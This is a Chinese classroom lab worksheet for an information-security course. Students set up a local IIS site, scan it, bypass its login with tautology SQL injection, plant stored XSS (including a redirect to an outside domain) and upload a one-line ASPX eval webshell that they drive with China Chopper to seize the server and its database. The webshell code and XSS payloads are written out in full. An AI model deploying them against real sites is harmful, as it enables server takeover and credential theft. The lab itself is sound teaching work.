信息安全实训——1.1

实训1-利用Web漏洞入侵网站并控制服务器

环境准备：在windows上部署一个IIS web服务

        一、打开web服务

1、控制面板——程序——程序与功能——启用或关闭Windows功能

2、将这四个框全勾上（注：若显示为黑框则代表未全勾上）

        二、部署一个IIS web服务

1、此电脑右击——管理——服务和应用程序——Internet Information Services(IIS)管理器

新建一个网站（可将原网站删除或者停掉）

应用程序池默认

ip地址为本机地址

将对应的物理地址添加进来

2、应用程序池——DefaultAppPool ——高级设置：将启用32位应用程序设置为True

3、服务——ASP.NET state Service 启动

扫描工具

局域网探查工具LanSee

端口扫描工具AdvancedPortScanner

网站后台扫描工具御剑

网站漏洞扫描工具AWVS

实验内容

网站后台绕过

1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。

2、尝试使用弱密码登录系统，观察登陆界面给出的反馈。

3、输入一些特殊字符，如‘’/+-=等，点击登录，观察系统反馈。

4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。

5、进入网站后台管理界面。

篡改页面内容

1、在网站前台或后台中寻找能够提交信息的合适位置。

2、提交代码<script>alert("test")</script>，使用另外的主机访问此网站，观察效果。

3、提交代码(代码中的网址可更改):

<script>window.location.href="http://d.mytanwan.com"</script>，观察效果。

一句话木马的使用

1、新建文本文档，将文件后缀修改为aspx，书写内容如下：

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密。

实验总结

1、端口扫描的目的是什么？

端口扫描可以帮助用户发现目标主机所开放的端口，进而了解主机上运行了哪些服务。

2、漏洞扫描的目的是什么？

漏洞扫描的目的是识别计算机网络或应用系统中存在的安全漏洞，以便及时采取措施进行修复，从而增强系统的安全性。

3、Webshell是什么？

Webshell是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，它主要用于网站管理、服务器管理、权限管理等操作。